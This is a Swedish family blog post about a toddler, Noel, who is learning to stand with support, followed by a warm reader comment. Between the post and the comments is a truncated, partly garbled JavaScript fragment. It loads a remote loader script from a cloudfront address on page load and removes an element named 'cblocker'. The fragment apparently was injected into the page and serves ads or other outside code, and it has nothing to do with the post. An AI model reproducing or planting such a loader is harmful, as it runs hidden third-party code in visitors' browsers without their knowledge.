Att stå själv

Vår helt egna fantastiska Noel som utvecklas på sitt helt egna vis, bortom alla normer och normala kurvor, men med full envishet så tar han sig an utmaning efter utmaning. Det nya är som sagt att stå upp. Nu mer står han själv uppåt någon minut och leker med saker som ligger i lagom stå-höjd på. Visserligen tar han stöd själv mot ex. soffan eller soffbordet, men förstår ni vilken fantastisk utveckling han gjort bara de senaste veckorna…Dock hade det ju varit praktiskt om den där sitta-själv-utan-stöd tekniken fanns där till fullo när man tappar balansen och drattar på ändan, fast det gör inget, för det är fantastiskt att han vill stå upp själv, han får dratta på ändan så många gånger han vill, vi tar emot varje gång tills han klarar av det helt själv!

 

 

// -1?’https':’http';var ccm=document.createElement(‘script’);ccm.type=’text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>

blogstats trackingpixel

2 reaktion på “Att stå själv

  1. Fina fina Noel! Man kan inget annat än att bli helt varm i hjärtat av att se dessa bilder :) Du är en fantastisk liten kille! Många kramar!

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *

Följande HTML-taggar och attribut är tillåtna: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>